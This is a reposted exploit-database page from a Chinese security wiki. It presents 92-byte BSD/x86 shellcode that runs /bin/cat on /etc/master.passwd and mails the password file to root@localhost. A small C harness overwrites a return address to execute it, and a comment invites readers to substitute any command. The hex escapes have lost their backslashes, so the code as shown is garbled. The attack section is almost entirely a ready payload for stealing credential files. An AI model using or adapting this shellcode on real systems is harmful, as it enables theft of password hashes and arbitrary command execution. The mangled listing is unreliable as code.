BSD/x86 – execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes)
| 漏洞ID | 1054683 | 漏洞类型 | |
| 发布时间 | 2004-09-26 | 更新时间 | 2004-09-26 |
![图片[1]-BSD/x86 – execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes)-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
N/A |
![图片[2]-BSD/x86 – execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes)-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
N/A |
| 漏洞平台 | BSD_x86 | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
*BSD version
FreeBSD, OpenBSD, NetBSD.
[email protected]
92 bytes.
_execve(/bin/sh -c "/bin/cat /etc/master.passwd|mail root@localhost");
pueden reemplzar el comando por lo que se les ocurra.
*/
char shellcode[]=
"xebx25" /* jmp <shellcode+39> */
"x59" /* popl %ecx */
"x31xc0" /* xorl %eax,%eax */
"x50" /* pushl %eax */
"x68x6ex2fx73x68" /* push $0x68732f6e */
"x68x2fx2fx62x69" /* push $0x69622f2f */
"x89xe3" /* movl %esp,%ebx */
"x50" /* pushl %eax */
"x66x68x2dx63" /* pushw $0x632d */
"x89xe7" /* movl %esp,%edi */
"x50" /* pushl %eax */
"x51" /* pushl %ecx */
"x57" /* pushl %edi */
"x53" /* pushl %ebx */
"x89xe7" /* movl %esp,%edi */
"x50" /* pushl %eax */
"x57" /* pushl %edi */
"x53" /* pushl %ebx */
"x50" /* pushl %eax */
"xb0x3b" /* movb $0x0b,%al */
"xcdx80" /* int $0x80 */
"xe8xd6xffxffxff" /* call <shellcode+2> */
"/bin/cat /etc/master.passwd|mail root@localhost";
main()
{
int *ret;
printf("Shellcode lenght=%dn",sizeof(shellcode));
ret=(int*)&ret+2;
(*ret)=(int)shellcode;
}
// milw0rm.com [2004-09-26]相关推荐: Microsoft Network Monitor (Netmon) HTTP协议分析器缓冲区溢出漏洞
Microsoft Network Monitor (Netmon) HTTP协议分析器缓冲区溢出漏洞 漏洞ID 1206142 漏洞类型 缓冲区溢出 发布时间 2000-12-19 更新时间 2000-12-19 CVE编号 CVE-2000-0817 CN…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666